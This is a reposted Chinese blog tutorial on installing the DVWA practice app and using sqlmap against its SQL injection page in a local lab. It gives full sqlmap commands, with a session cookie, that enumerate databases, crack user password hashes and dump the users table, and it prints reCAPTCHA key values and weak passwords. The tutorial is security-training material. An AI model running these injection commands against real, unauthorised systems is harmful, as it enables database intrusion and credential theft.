DVWA+SQLmap+Mysql注入实战

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS PostgreSQL,高可用系列 2核4GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介:

一、部署渗透测试演练系统DVWA


1. 下载DVWA软件包

    官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9

    wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master


2. 部署linux环境

    yum install -y httpd mysql mysql-server php php-mysql php-gd


3. 开启httpd和mysqld服务

    service httpd start

    service mysqld start


4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常

    vim /var/www/html/test.php

    写入:

   <?php

     phpinfo();

   ?>


5. 修改mysql的密码

     mysqladmin -uroot password "123456"


6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9


7. 修改DVWA配置文件数据库密码为123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密码:

    $_DVWA[ 'db_password' ] = '123456';

 wKiom1ir7Zqx50rWAAAP-62Y_pI155.png


8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错    

 wKioL1ir7XqzRVPOAACIFpWTX4A702.png


   解决方法:

   1)编辑php的配置文件 vim /etc/php.ini

        allow_url_include = On

 wKioL1ir7b-w2fnpAAAN5J3Xzs8076.png


   2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:

       公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 wKiom1ir7eKBimnKAAAbMpRMHrA320.png


wKiom1ir7g6QSbuPAACTPfN-Vpc641.png

wKioL1ir7imwM_wfAAAjjIuOh70351.png

    


9. 重启http,使修改的配置文件生效,刷新web界面,错误消除

    service httpd restart

 wKioL1ir7k2iQ69HAABWVJhzP2s567.png


10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password

      至此,DVWA已部署完成

      wKiom1ir7mPx7mZKAADua26pFAg653.png



二、安装SQLmap漏洞查看工具

 

1. 官方下载:http://sqlmap.org/http://sqlmap.org/

     版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz


2.  解压sqlmap,并执行

      说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行

     wKioL1ir7pKy6QmJAAAJO0svK9E341.png


      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

      wKiom1ir7rHicRpaAAApvyYH0lE089.png


3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

      wKiom1ir7sWD15LEAAAVcG8dWIw364.png



三、实战

        实战1:枚举登录MYSQL数据的用户名与密码

        实战2:枚举所有数据库

        实战3:枚举指定数据库的数据表

        实战4:获取指定数据库和表中所有列的信息

        实战5:枚举指定数据表中的所有用户名与密码


       环境准备:

       1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;


       2)开启Firefox浏览器TamperData插件,等待获取cookies值;


       3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

             获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#


       4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552


        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png


wKiom1ir7xaQEBcYAABbjMUXB0w015.png



实战1:枚举登录MYSQL数据的用户名与密码

   sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user


说明:根据提示回复Y,继续


wKiom1ir73_DP8MFAABNbA9Svfw188.png


结果:得到当前数据库为dawa,使用的用户为root@localhost


wKioL1ir75iB4QDPAAA4GIZMCIU558.png



实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png


说明:选择目录下字典文件,暴力破解


wKioL1ir79zz1rl9AAAboWh7XLg480.png


结果:数据库用户名为root,密码也有明文形式123456


wKiom1ir7-igiyGKAAAj8h9xVlw598.png



实战3:枚举数据库和指定数据库的数据表

   sqlmap语法参数:

  • --dbs:枚举当前数据库


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs


结果:mysql下所有的数据库

wKiom1ir8ALiZIK3AAAmjvflPbM786.png


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables


结果:dvwa库中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png


实战4:获取指定数据库和表中所有列的信息

   sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns


结果:dvwa库,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png



实战5:枚举指定数据表中的所有用户名与密码

   sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump


结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png










本文转自 huangzp168 51CTO博客,原文链接:http://blog.51cto.com/huangzp/1899871,如需转载请自行联系原作者
相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
2月前
|
负载均衡 算法 关系型数据库
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
本文聚焦 MySQL 集群架构中的负载均衡算法,阐述其重要性。详细介绍轮询、加权轮询、最少连接、加权最少连接、随机、源地址哈希等常用算法,分析各自优缺点及适用场景。并提供 Java 语言代码实现示例,助力直观理解。文章结构清晰,语言通俗易懂,对理解和应用负载均衡算法具有实用价值和参考价值。
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
|
8月前
|
缓存 关系型数据库 MySQL
MySQL索引策略与查询性能调优实战
在实际应用中,需要根据具体的业务需求和查询模式,综合运用索引策略和查询性能调优方法,不断地测试和优化,以提高MySQL数据库的查询性能。
532 66
|
4月前
|
SQL 安全 关系型数据库
mysql注入-字符编码技巧
通过字符编码技巧,攻击者可以在SQL注入中绕过常见的输入验证机制,成功攻击数据库。因此,理解这些技巧及其可能的攻击路径,对防御SQL注入至关重要。开发者应采取多层次的安全措施,确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查,可以有效地提高系统的安全性,防止SQL注入攻击带来的风险。
182 72
|
8月前
|
前端开发 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
【10月更文挑战第21天】 本文将深入浅出地探讨如何使用PHP与MySQL构建一个动态网站,从环境搭建到项目部署,全程实战演示。无论你是编程新手还是希望巩固Web开发技能的老手,都能在这篇文章中找到实用的技巧和启发。我们将一起探索如何通过PHP处理用户请求,利用MySQL存储数据,并最终呈现动态内容给用户,打造属于自己的在线平台。 ####
306 0
|
6月前
|
SQL 存储 关系型数据库
MySQL秘籍之索引与查询优化实战指南
最左前缀原则。不冗余原则。最大选择性原则。所谓前缀索引,说白了就是对文本的前几个字符建立索引(具体是几个字符在建立索引时去指定),比如以产品名称的前 10 位来建索引,这样建立起来的索引更小,查询效率更快!
240 22
 MySQL秘籍之索引与查询优化实战指南
|
8月前
|
安全 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
——深入探索LAMP栈下的高效数据交互与处理技巧 ####
|
8月前
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实战指南####
深入探索PHP与MySQL的协同工作机制,本文旨在通过一系列实战案例,揭示构建高效、稳定且用户友好的动态网站的秘诀。从环境搭建到数据交互,再到最佳实践分享,本文为开发者提供了一条清晰的学习路径,助力其在LAMP(Linux, Apache, MySQL, PHP/Perl/Python)栈上实现技术飞跃。 ####
|
8月前
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实战指南####
本文深入探讨了PHP与MySQL在动态网站开发中的应用实践,通过具体案例解析如何高效结合这两大技术构建数据驱动的Web应用。文章将涵盖环境搭建、基础语法回顾、数据库设计与操作、用户注册与登录系统实现等关键步骤,旨在为开发者提供一个从零到一的项目实战路径,展示PHP与MySQL协同工作的强大能力。 ####
|
8月前
|
监控 关系型数据库 MySQL
数据库优化:MySQL索引策略与查询性能调优实战
【10月更文挑战第27天】本文深入探讨了MySQL的索引策略和查询性能调优技巧。通过介绍B-Tree索引、哈希索引和全文索引等不同类型,以及如何创建和维护索引,结合实战案例分析查询执行计划,帮助读者掌握提升查询性能的方法。定期优化索引和调整查询语句是提高数据库性能的关键。
1019 1
|
9月前
|
NoSQL 关系型数据库 MySQL
MySQL与Redis协同作战:优化百万数据查询的实战经验
【10月更文挑战第13天】 在处理大规模数据集时,传统的关系型数据库如MySQL可能会遇到性能瓶颈。为了提升数据处理的效率,我们可以结合使用MySQL和Redis,利用两者的优势来优化数据查询。本文将分享一次实战经验,探讨如何通过MySQL与Redis的协同工作来优化百万级数据统计。
447 5

推荐镜像

更多